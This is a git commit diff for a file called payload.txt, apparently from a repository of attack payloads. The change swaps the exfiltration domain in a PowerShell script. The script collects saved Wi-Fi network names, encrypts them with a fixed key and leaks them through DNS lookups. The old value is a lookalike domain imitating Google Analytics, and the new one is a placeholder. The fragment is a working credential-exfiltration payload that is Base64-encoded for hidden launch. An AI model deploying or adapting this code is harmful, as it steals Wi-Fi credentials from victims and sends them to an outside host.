Update payload.txt

pull/4/head
Keld Norman 2021-10-17 01:30:09 +02:00 committed by GitHub
parent f6c3ebe078
commit 0d114093ae
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 1 additions and 1 deletions

View File

@ -63,7 +63,7 @@ $scriptblock={
$wifinames.trim()
}
$KEY="EncryptDataWithThisCode"
$SUB=".e.googlenalytics.com"
$SUB=".i.yourdomain.com"
wifi|%{enc -K "$KEY" -T "$_"}|%{dns "$_"}|out-null
}
$encoded = [convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($scriptblock))